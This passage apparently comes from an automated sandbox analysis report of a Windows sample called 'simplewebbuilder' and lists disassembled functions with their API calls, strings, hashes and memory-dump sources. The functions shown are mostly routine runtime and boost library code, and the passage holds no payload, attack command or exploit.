                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID: bad allocation
                                                                                                                            • API String ID: 3074076210-2104205924
                                                                                                                            • Opcode ID: ea690ddaa51a6e5259644e4563c8db4b617190bef7097bdf74ecdf5e373af953
                                                                                                                            • Instruction ID: 30b3ce4d0cc05f8187eb0ddf7debb3ccc2584aa1a48d20526a9974e5ba21cf88
                                                                                                                            • Opcode Fuzzy Hash: ea690ddaa51a6e5259644e4563c8db4b617190bef7097bdf74ecdf5e373af953
                                                                                                                            • Instruction Fuzzy Hash: 94E03034E4420AAACF10FFA4DC51FEF77A8AB60310F504459A824A6591DF70DA54D792
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B37B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B37B6
                                                                                                                            • __localtime64.LIBCMT ref: 009B37C1
                                                                                                                              • Part of subcall function 009C2C00: __gmtime64_s.LIBCMT ref: 009C2C13
                                                                                                                            • std::exception::exception.LIBCMT ref: 009B37D9
                                                                                                                              • Part of subcall function 009C2AD3: std::exception::_Copy_str.LIBCMT ref: 009C2AEC
                                                                                                                              • Part of subcall function 009BAB1E: __EH_prolog.LIBCMT ref: 009BAB23
                                                                                                                              • Part of subcall function 009BAB1E: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009BAB32
                                                                                                                              • Part of subcall function 009BAB1E: __CxxThrowException@8.LIBCMT ref: 009BAB51
                                                                                                                            Strings
                                                                                                                            • could not convert calendar time to UTC time, xrefs: 009B37CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                                                            • API String ID: 1963798777-2088861013
                                                                                                                            • Opcode ID: 2c35f15be135b857bc7622f8afdfbaa9d9f184dd3cae383c92c90710c1fcb6d7
                                                                                                                            • Instruction ID: 035487aea9edd2f2322ffbd1a6347671bbbd070fb9e0352cee5253afe9d52eb8
                                                                                                                            • Opcode Fuzzy Hash: 2c35f15be135b857bc7622f8afdfbaa9d9f184dd3cae383c92c90710c1fcb6d7
                                                                                                                            • Instruction Fuzzy Hash: 50E06DB1C4420A9ACB20FF90C905BFEB7B8EB44314F40855AE815A2241DB749609CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040436C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004030CC), ref: 00404371
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404381
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                            • Opcode ID: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction ID: ae1f0f37a1caea7582e622d33e18e97b99b5337afe9bfc2040585345cf76d9d0
                                                                                                                            • Opcode Fuzzy Hash: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction Fuzzy Hash: A4C012B0780701A2EA201BB02F0AB1622280B80F02F16243EAB8DF08C2CE7CD805A42D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403CF8 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403490), ref: 00403D19
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403490), ref: 00403D3D
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403490), ref: 00403D57
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403490), ref: 00403E18
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403490), ref: 00403E2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 714016831-0
                                                                                                                            • Opcode ID: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction ID: 82e4f5ca211df2534f48b16e1633463362d6e61a1909367565888a0a16669b2c
                                                                                                                            • Opcode Fuzzy Hash: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction Fuzzy Hash: 2331E370601706ABE3308F24DD49B22BBA8EB48756F14463BE555BB7E1E778AD40CB4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009CC9E9 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustPointer_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1721217611-0
                                                                                                                            • Opcode ID: e89ea2f4857698563857d07c02b95d6029b4d133af8a11b520ce45c9acb3c249
                                                                                                                            • Instruction ID: d641029581df085fab47ccb3d6f60437fc65a0b4a644f85f7806055617352aaf
                                                                                                                            • Opcode Fuzzy Hash: e89ea2f4857698563857d07c02b95d6029b4d133af8a11b520ce45c9acb3c249
                                                                                                                            • Instruction Fuzzy Hash: A54189B6A483066BEB249FA4D842F767BA89F41324F24441EF849A61D1EB75EC80D612
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C1920 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,009B4149), ref: 009C19BF
                                                                                                                              • Part of subcall function 009B3FDC: __EH_prolog.LIBCMT ref: 009B3FE1
                                                                                                                              • Part of subcall function 009B3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 009B3FF3
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009C19B4
                                                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,009B4149), ref: 009C1A00
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,009B4149), ref: 009C1AD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2825413587-0
                                                                                                                            • Opcode ID: 41cd3489cf7b6ea063a6b07b1a04744b934a0027fd72335d505e255fa08fc773
                                                                                                                            • Instruction ID: 5487857e4df98b4ebe1fb1b97a09d932d2a1ced61371ded81c8c9e9a5d6f176f
                                                                                                                            • Opcode Fuzzy Hash: 41cd3489cf7b6ea063a6b07b1a04744b934a0027fd72335d505e255fa08fc773
                                                                                                                            • Instruction Fuzzy Hash: 9C51E471A003058BDB11DF28C884B9A77E8FF89328F15461CF86997392D735DD45CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C3DAD Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2782032738-0
                                                                                                                            • Opcode ID: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
                                                                                                                            • Instruction ID: 2134e423465d06169d69f33f949d8e277997575c9b373155c3f35de608b2603f
                                                                                                                            • Opcode Fuzzy Hash: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
                                                                                                                            • Instruction Fuzzy Hash: FE41B571F00606ABDB18CEA9C890F6E7BA9AF84350B24C53DE416C7690D771DF418B52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009D0515 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009D054B
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 009D0579
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 009D05A7
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 009D05DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: b48c5cfd4bd48c3613baad1b331e301716a8a0bb54ced3b50d218335d1d6671f
                                                                                                                            • Instruction ID: 71b8020a444bc7b4c7821ec780b9429d40298daa45affdb7a73b2100b2ac58ab
                                                                                                                            • Opcode Fuzzy Hash: b48c5cfd4bd48c3613baad1b331e301716a8a0bb54ced3b50d218335d1d6671f
                                                                                                                            • Instruction Fuzzy Hash: 4E31C431684246EFDB21CF66E844BAA7FA9FF81310F15842AFC55872A0D730E851DF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B3D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • htons.WS2_32(?), ref: 009B3DA2
                                                                                                                              • Part of subcall function 009B3BD3: __EH_prolog.LIBCMT ref: 009B3BD8
                                                                                                                              • Part of subcall function 009B3BD3: std::bad_exception::bad_exception.LIBCMT ref: 009B3BED
                                                                                                                            • htonl.WS2_32(00000000), ref: 009B3DB9
                                                                                                                            • htonl.WS2_32(00000000), ref: 009B3DC0
                                                                                                                            • htons.WS2_32(?), ref: 009B3DD4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3882411702-0
                                                                                                                            • Opcode ID: 012c250de2d475e1614741cd810dd9898eccaadc031d0571b32e94f31ea28318
                                                                                                                            • Instruction ID: 1fac29aa1a720319530a4e020f4321de9837db7c664658af191ca170dd7a76e1
                                                                                                                            • Opcode Fuzzy Hash: 012c250de2d475e1614741cd810dd9898eccaadc031d0571b32e94f31ea28318
                                                                                                                            • Instruction Fuzzy Hash: 5511CE36614209EFCF01DFA4D985AAAB7B8EF48324F00C056FD04DF252DA719A44D7A1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 009B23D0
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B23DE
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B2401
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B2408
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4018804020-0
                                                                                                                            • Opcode ID: 65ce94b1171da376db7850e524c4544cf455608c8b9a69998194196da2b0b332
                                                                                                                            • Instruction ID: b8b7bbf6e6724bf89c50f8dfc8e6913145a53a331143b668d7fd6ada9f74aa44
                                                                                                                            • Opcode Fuzzy Hash: 65ce94b1171da376db7850e524c4544cf455608c8b9a69998194196da2b0b332
                                                                                                                            • Instruction Fuzzy Hash: F811AC31201204ABDB109F60CA84BABBBBDFF54B14F10406DE9019A121EBB5E845DBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009CCE3B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction ID: ede7b0af73c53a1a01ae73da4e0c72b1db3e6396aefa23040ec32a8a60b10fd3
                                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction Fuzzy Hash: CD01437280414DBBCF165E94DC41EEE3F26BF59354B548419FE2856031D336C971AB82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009B24A9
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B24B8
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B24CD
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B24D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4018804020-0
                                                                                                                            • Opcode ID: c4cc2b672545ae76fec516ed0ff490480e57863dda401816f8130fd1a237ab3a
                                                                                                                            • Instruction ID: 57675e3f545583b31e8b0daf9815d39f91073bbf79ed19a2e2de3cb897cd94b3
                                                                                                                            • Opcode Fuzzy Hash: c4cc2b672545ae76fec516ed0ff490480e57863dda401816f8130fd1a237ab3a
                                                                                                                            • Instruction Fuzzy Hash: 01F03C72145205AFDB00AF65EC85FDABBACFF49710F04801AFA04C6152DB71E994DBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B2009
                                                                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 009B2028
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009B2037
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009B204E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2456309408-0
                                                                                                                            • Opcode ID: 7d4e80214fac3738723d9b44de13876e78d5d5b4123fcc2f858a2634093e3d5d
                                                                                                                            • Instruction ID: 8908a1c62fcaa55735731b65807c01a61f970bfec534803df5a5220dd4c97a32
                                                                                                                            • Opcode Fuzzy Hash: 7d4e80214fac3738723d9b44de13876e78d5d5b4123fcc2f858a2634093e3d5d
                                                                                                                            • Instruction Fuzzy Hash: FD018171445614DBC734AF64E908BDAB7F8FF08715F00852EF44692AA1CBB46948CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$H_prologSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1765829285-0
                                                                                                                            • Opcode ID: e4a2a4f5adbff19b14f71e69ec0a7fe53d631766c134a9953a8a3c0ba494b95d
                                                                                                                            • Instruction ID: d42eb2c3f1b4fa876a2563e5c8634936e3a3d7f3301c333bc214c76876bed5d5
                                                                                                                            • Opcode Fuzzy Hash: e4a2a4f5adbff19b14f71e69ec0a7fe53d631766c134a9953a8a3c0ba494b95d
                                                                                                                            • Instruction Fuzzy Hash: DEF03036695510DFCB009F94DC88B99BBA4FF09312F00816AF5199B391CB359844DB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BA54B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog_memmove
                                                                                                                            • String ID: &'
                                                                                                                            • API String ID: 3529519853-655172784
                                                                                                                            • Opcode ID: 345cad969aa5ebb9256e554040faf9afb7deed60309a1ce321025110031f3c64
                                                                                                                            • Instruction ID: 270e798b1e24b1f1e65b0118d880e735bbce9f7e656284c44efb7f2fdd481aab
                                                                                                                            • Opcode Fuzzy Hash: 345cad969aa5ebb9256e554040faf9afb7deed60309a1ce321025110031f3c64
                                                                                                                            • Instruction Fuzzy Hash: 6F618271D00209DFCF20DFA4CA81BEEBBB9AF98320F14416EE405AB151EB709E45CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406582 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00406596
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                                            • Opcode ID: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction ID: ecf7deb6fed8900c4d79a36e1d1ce5f6dbda1fd4730ae83dc28ca19186aff87e
                                                                                                                            • Opcode Fuzzy Hash: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction Fuzzy Hash: 4D415B31000258AAEB119718DD99BFB3FE8DB01700F1505F6D547F71D2C37A49A4CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B9C5F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,009B89C9,?,?,00000000), ref: 009B9CC6
                                                                                                                            • getsockname.WS2_32(?,?,?), ref: 009B9CDC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastgetsockname
                                                                                                                            • String ID: &'
                                                                                                                            • API String ID: 566540725-655172784
                                                                                                                            • Opcode ID: c9734c46c139c900420d912b3295ce7ed20ca17332c076671d9dba3f6730c0ef
                                                                                                                            • Instruction ID: d22960a8dbaba15150186558aede0afd83774a46bd4e55b3ec3d940a3f7a18a5
                                                                                                                            • Opcode Fuzzy Hash: c9734c46c139c900420d912b3295ce7ed20ca17332c076671d9dba3f6730c0ef
                                                                                                                            • Instruction Fuzzy Hash: 5021A172A14208AFCB10DF68D945ACEBBF4FF4C320F20842AE918EB281D734E9458791
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BD2A5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BD2AA
                                                                                                                              • Part of subcall function 009BD886: std::exception::exception.LIBCMT ref: 009BD8B5
                                                                                                                              • Part of subcall function 009BE03C: __EH_prolog.LIBCMT ref: 009BE041
                                                                                                                              • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
                                                                                                                              • Part of subcall function 009BD8E5: __EH_prolog.LIBCMT ref: 009BD8EA
                                                                                                                            Strings
                                                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009BD2E7
                                                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 009BD2E0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                                            • API String ID: 1953324306-1943798000
                                                                                                                            • Opcode ID: e691cc602fd1fa27ce8f8e96f08ed1cf1802e6e388a48d20676dd1421f807332
                                                                                                                            • Instruction ID: 19dd3587c2ec1452e27156cd75b9254c64c778f70ff2379891545affdf373b63
                                                                                                                            • Opcode Fuzzy Hash: e691cc602fd1fa27ce8f8e96f08ed1cf1802e6e388a48d20676dd1421f807332
                                                                                                                            • Instruction Fuzzy Hash: 1A21DD71D05248AADB14EFE8D955BEEBBB8EF94314F00805EF815AB381EB705A04CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BD39A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BD39F
                                                                                                                              • Part of subcall function 009BD95D: std::exception::exception.LIBCMT ref: 009BD98A
                                                                                                                              • Part of subcall function 009BE173: __EH_prolog.LIBCMT ref: 009BE178
                                                                                                                              • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
                                                                                                                              • Part of subcall function 009BD9BA: __EH_prolog.LIBCMT ref: 009BD9BF
                                                                                                                            Strings
                                                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009BD3DC
                                                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 009BD3D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                                                            • API String ID: 1953324306-412195191
                                                                                                                            • Opcode ID: 7498f3fdf828b49147973583c797bd6db621dcbd59e2b5bf303044eff28c57af
